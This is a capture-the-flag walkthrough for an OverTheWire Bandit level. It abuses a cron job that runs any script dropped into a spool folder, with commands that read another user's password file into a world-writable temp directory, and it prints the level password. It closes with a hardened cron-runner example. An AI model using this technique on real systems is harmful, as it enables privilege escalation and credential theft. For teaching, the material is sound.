Warning: This post contains a solution!
Only continue if:
1.) you want to see a possible alternative solution or
2.) you are stuck and need a hint!
Connect to the server using the following credentials:
Level Goal is:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Check the content of the folder /etc/cron.d/:
bandit23@bandit:~$ ls /etc/cron.d/
cronjob_bandit22  cronjob_bandit23  cronjob_bandit24
There are three files; the third one (cronjob_bandit24) is the interesting one for the current level. Take a look at its content:
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
The script /usr/bin/cronjob_bandit24.sh is executed as user bandit24 once on reboot and then every minute.
Take a look at the content of the script:
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i
    fi
done
As mentioned in line seven, this script executes every script in the folder '/var/spool/$myname', which is '/var/spool/bandit24' in our case. After executing a script, it deletes the script (line 14). Because the cron job runs as bandit24, anything placed in that folder runs with bandit24's permissions.
A temporary folder is needed to save the flag to. First create it and set its permissions to 777 (lazy, I know), so that bandit24, the user the cron job runs as, can write to it:
bandit23@bandit:~$ mkdir /tmp/lvl2324
bandit23@bandit:~$ chmod 777 /tmp/lvl2324
Now move to that temporary directory and create a short shell script (script.sh here) that writes the content of '/etc/bandit_pass/bandit24' to '/tmp/lvl2324/password':
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/lvl2324/password
Copy that shell script file to '/var/spool/bandit24'. The cron job invokes it as ./$i, so the file has to be executable by bandit24:
bandit23@bandit:/tmp/lvl2324$ cp script.sh /var/spool/bandit24/
Wait until the shell script file in the folder is deleted and check the password file:
bandit23@bandit:/tmp/lvl2324$ cat password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
The password is: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Don't forget to delete the temporary folder:
bandit23@bandit:~$ rm -rf /tmp/lvl2324
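Seen from the defender's side, the cron loop above runs whatever any user drops into the spool folder. The following variant checks each entry before running it. It is an added example, not part of the original post or of the Bandit server; the function names and the allowed-uid parameter are assumptions, and it relies on GNU coreutils.

```bash
#!/bin/bash
# Added example. Assumes GNU coreutils (stat -c, timeout); names are hypothetical.

# Succeeds only if $1 is a regular file (not a symlink), owned by uid $2,
# and not writable by group or others.
is_trusted_job() {
    local f=$1 uid=$2 mode
    [ -L "$f" ] && return 1
    [ -f "$f" ] || return 1
    [ "$(stat -c '%u' "$f")" = "$uid" ] || return 1
    mode=$(stat -c '%a' "$f")
    [ $(( 0$mode & 022 )) -eq 0 ]
}

# Runs the trusted entries of spool directory $1 (expected owner uid $2) and
# removes every entry afterwards; untrusted entries are removed without running.
run_spool() {
    local spool=$1 uid=$2 job
    for job in "$spool"/* "$spool"/.*; do
        case ${job##*/} in .|..) continue ;; esac
        [ -e "$job" ] || [ -L "$job" ] || continue   # glob matched nothing
        if is_trusted_job "$job" "$uid"; then
            echo "Running $job"
            timeout -s 9 60 "$job"
        else
            echo "Skipping $job (owner, type or mode check failed)"
        fi
        rm -f -- "$job"
    done
}

# Constructed sample spool: one job with mode 700, one world-writable job.
demo() {
    local d
    d=$(mktemp -d)
    printf '#!/bin/sh\necho job-good-ran\n' > "$d/good.sh"; chmod 700 "$d/good.sh"
    printf '#!/bin/sh\necho job-open-ran\n' > "$d/open.sh"; chmod 777 "$d/open.sh"
    run_spool "$d" "$(id -u)"
    rmdir "$d"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

The check and the run are separate steps, so the spool directory should also carry the sticky bit to keep users from replacing each other's files in between.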